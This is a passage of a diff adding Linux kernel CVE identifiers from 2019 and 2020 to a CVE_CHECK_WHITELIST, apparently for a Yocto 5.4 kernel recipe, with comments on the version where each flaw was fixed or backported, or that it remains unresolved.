+CVE_CHECK_WHITELIST += "CVE-2019-15098"
+
+# cpe-stable-backport: Backported in 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15099"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15117"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15118"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15211"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15212"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15213"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15214"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15215"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15216"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15217"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15218"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15219"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15220"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-15221"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15222"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15223"
+
+# CVE-2019-15239 has no known resolution
+
+# CVE-2019-15290 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-15291"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15292"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-15504"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15505"
+
+# fixed-version: Fixed after version 5.3rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15538"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15666"
+
+# CVE-2019-15791 has no known resolution
+
+# CVE-2019-15792 has no known resolution
+
+# CVE-2019-15793 has no known resolution
+
+# CVE-2019-15794 needs backporting (fixed from 5.12)
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15807"
+
+# CVE-2019-15902 has no known resolution
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15916"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15917"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15918"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15919"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15920"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15921"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15922"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15923"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15924"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15925"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15926"
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15927"
+
+# CVE-2019-16089 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16229"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16230"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-16231"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16232"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-16233"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-16234"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16413"
+
+# fixed-version: Fixed after version 5.3rc7
+CVE_CHECK_WHITELIST += "CVE-2019-16714"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-16746"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16921"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-16994"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16995"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17052"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17053"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17054"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17055"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17056"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-17075"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-17133"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17351"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-17666"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18198"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18282"
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18660"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2019-18675"
+
+# CVE-2019-18680 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18683"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-18786"
+
+# fixed-version: Fixed after version 5.1rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18805"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18806"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18807"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-18808"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-18809"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18810"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18811"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18812"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18813"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2019-18814"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18885"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19036"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19037"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19039"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2019-19043"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19044"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19045"
+
+# cpe-stable-backport: Backported in 5.4.15
+CVE_CHECK_WHITELIST += "CVE-2019-19046"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19047"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19048"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19049"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19050"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19051"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19052"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19053"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-19054"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19055"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19056"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19057"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19058"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19059"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19060"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19061"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19062"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19063"
+
+# cpe-stable-backport: Backported in 5.4.13
+CVE_CHECK_WHITELIST += "CVE-2019-19064"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19065"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19066"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19067"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19068"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19069"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19070"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19071"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19072"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19073"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19074"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19075"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19076"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19077"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19078"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-19079"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19080"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19081"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19082"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19083"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19227"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2019-19241"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19252"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19318"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19319"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19332"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19338"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19377"
+
+# CVE-2019-19378 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2019-19447"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2019-19448"
+
+# CVE-2019-19449 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2019-19462"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19523"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-19524"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19525"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19526"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19527"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19528"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19529"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19530"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19531"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19532"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19533"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19534"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19535"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19536"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19537"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19543"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19602"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19767"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2019-19768"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2019-19769"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2019-19770"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19807"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19813"
+
+# CVE-2019-19814 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19922"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19927"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19947"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-19965"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19966"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-1999"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20054"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20095"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-20096"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2024"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2019-2025"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20422"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2054"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-20636"
+
+# CVE-2019-20794 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20806"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2019-20810"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20811"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-20812"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20908"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-20934"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2101"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2181"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2019-2182"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-2213"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-2214"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2215"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-25044"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-25045"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-25160"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2019-25162"
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2019-3016"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3459"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3460"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-3701"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3819"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3837"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3846"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3874"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3882"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3887"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3892"
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3896"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3900"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3901"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-5108"
+
+# Skipping CVE-2019-5489, no affected_versions
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-6133"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-6974"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7221"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7222"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-7308"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-8912"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-8956"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-8980"
+
+# fixed-version: Fixed after version 5.0rc4
+CVE_CHECK_WHITELIST += "CVE-2019-9003"
+
+# fixed-version: Fixed after version 5.0rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9162"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-9213"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9245"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9444"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9445"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9453"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2019-9454"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9455"
+
+# fixed-version: Fixed after version 4.16rc6
+CVE_CHECK_WHITELIST += "CVE-2019-9456"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9457"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9458"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9466"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9500"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9503"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-9506"
+
+# fixed-version: Fixed after version 5.1rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9857"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0009"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2020-0030"
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2020-0041"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2020-0066"
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-0067"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0110"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-0255"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0305"
+
+# CVE-2020-0347 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2020-0404"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-0423"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2020-0427"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-0429"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0430"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0431"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-0432"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0433"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0435"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-0444"
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2020-0465"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-0466"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-0543"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-10135"
+
+# cpe-stable-backport: Backported in 5.4.8
+CVE_CHECK_WHITELIST += "CVE-2020-10690"
+
+# CVE-2020-10708 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-10711"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10720"
+
+# cpe-stable-backport: Backported in 5.4.44
+CVE_CHECK_WHITELIST += "CVE-2020-10732"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2020-10742"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-10751"
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2020-10757"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10766"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10767"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10768"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10769"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2020-10773"
+
+# CVE-2020-10774 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-10781"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-10942"
+
+# cpe-stable-backport: Backported in 5.4.32
+CVE_CHECK_WHITELIST += "CVE-2020-11494"
+
+# cpe-stable-backport: Backported in 5.4.31
+CVE_CHECK_WHITELIST += "CVE-2020-11565"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11608"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11609"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11668"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-11669"
+
+# CVE-2020-11725 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-11884"
+
+# CVE-2020-11935 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2020-12114"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12351"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12352"
+
+# CVE-2020-12362 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12363 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12364 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-12464"
+
+# cpe-stable-backport: Backported in 5.4.26
+CVE_CHECK_WHITELIST += "CVE-2020-12465"
+
+# cpe-stable-backport: Backported in 5.4.14
